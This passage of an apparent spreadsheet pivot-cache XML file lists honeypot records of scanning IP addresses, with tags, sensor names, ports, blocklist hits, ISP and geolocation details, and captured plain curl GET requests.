    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;NA&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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dc84:2623"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1705"/>
    <x v="1705"/>
    <s v="114-35-2-131.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T06:10:41"/>
    <d v="2023-08-19T04:14:59"/>
    <d v="2025-04-15T06:10:41"/>
    <n v="330"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;37932&amp;&amp;53875&amp;&amp;9100&amp;&amp;38854&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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:283"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1706"/>
    <x v="1706"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T06:06:15"/>
    <d v="2025-04-14T22:37:51"/>
    <d v="2025-04-15T06:06:15"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:71dc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1707"/>
    <x v="1707"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T06:01:39"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-15T06:01:39"/>
    <n v="118"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;53&amp;&amp;786&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="67"/>
    <s v="Nam Định Province"/>
    <s v="Huyện Xuân Trường"/>
    <s v="Xuân Trường"/>
    <s v="8554356"/>
    <s v="NA"/>
    <s v="20.2923"/>
    <s v="106.333"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a0:c473"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1708"/>
    <x v="1708"/>
    <s v="NA&amp;&amp;softbank060140163090.bbtec.net"/>
    <x v="0"/>
    <d v="2025-04-15T05:10:14"/>
    <d v="2024-07-09T03:11:00"/>
    <d v="2025-04-15T05:10:14"/>
    <n v="79"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;16108&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Minato-ku"/>
    <s v="Minato-ku"/>
    <s v="1857091"/>
    <s v="NA"/>
    <s v="35.6629"/>
    <s v="139.761"/>
    <s v="17676"/>
    <s v="SoftBank Corp."/>
    <s v="SoftBank Corp."/>
    <s v="business"/>
    <s v="Japan Nation-wide Network of Softbank Corp."/>
    <s v="2004-05-20"/>
    <s v="BBTEC"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3c8c:a35a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1709"/>
    <x v="1709"/>
    <s v="NA&amp;&amp;125-228-183-243.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-15T05:10:11"/>
    <d v="2024-12-24T14:22:10"/>
    <d v="2025-04-15T05:10:11"/>
    <n v="286"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="23&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:b7f3"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1710"/>
    <x v="1710"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T04:35:07"/>
    <d v="2025-04-15T04:35:07"/>
    <d v="2025-04-15T04:35:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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dd:7aa3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1711"/>
    <x v="1711"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T04:27:44"/>
    <d v="2025-04-15T04:24:21"/>
    <d v="2025-04-15T04:27:44"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BE"/>
    <s v="Belgium"/>
    <s v="BRU"/>
    <s v="Brussels Capital"/>
    <s v="Bruxelles-Capitale"/>
    <s v="Saint-Gilles"/>
    <s v="2787413"/>
    <s v="1060"/>
    <s v="50.8276"/>
    <s v="4.34389"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe SRL"/>
    <s v="hosting"/>
    <s v="M247 Ltd Brussels"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5b5a:7b09"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1712"/>
    <x v="1712"/>
    <s v="125-229-151-234.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T04:08:51"/>
    <d v="2024-05-28T00:57:58"/>
    <d v="2025-04-15T04:08:51"/>
    <n v="457"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;4962&amp;&amp;23&amp;&amp;9100&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GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:97ea"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1713"/>
    <x v="1713"/>
    <s v="114-35-33-52.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T04:02:26"/>
    <d v="2023-08-11T04:03:00"/>
    <d v="2025-04-15T04:02:26"/>
    <n v="47664"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;61071&amp;&amp;23&amp;&amp;80&amp;&amp;NA"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7223:2134"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1714"/>
    <x v="1714"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:57:31"/>
    <d v="2025-01-14T06:00:48"/>
    <d v="2025-04-15T03:57:31"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="abuse.ch&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:c84a"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1715"/>
    <x v="1715"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:53:37"/>
    <d v="2025-04-15T03:53:37"/>
    <d v="2025-04-15T03:53:37"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:a967"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1716"/>
    <x v="1716"/>
    <s v="59-126-250-86.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-15T03:29:31"/>
    <d v="2023-11-25T02:39:08"/>
    <d v="2025-04-15T03:29:31"/>
    <n v="1071"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;123&amp;&amp;389&amp;&amp;41332&amp;&amp;5947&amp;&amp;39380&amp;&amp;80&amp;&amp;23&amp;&amp;33037&amp;&amp;NA"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:fa56"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1717"/>
    <x v="1717"/>
    <s v="NA&amp;&amp;93-41-182-249.ip82.fastwebnet.it"/>
    <x v="0"/>
    <d v="2025-04-15T03:27:54"/>
    <d v="2024-02-11T11:25:00"/>
    <d v="2025-04-15T03:27:54"/>
    <n v="313"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;56154"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="12874"/>
    <s v="Fastweb SpA"/>
    <s v="Fastweb SpA"/>
    <s v="business"/>
    <s v="Fastweb POP Internet Singolo"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5d29:b6f9"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
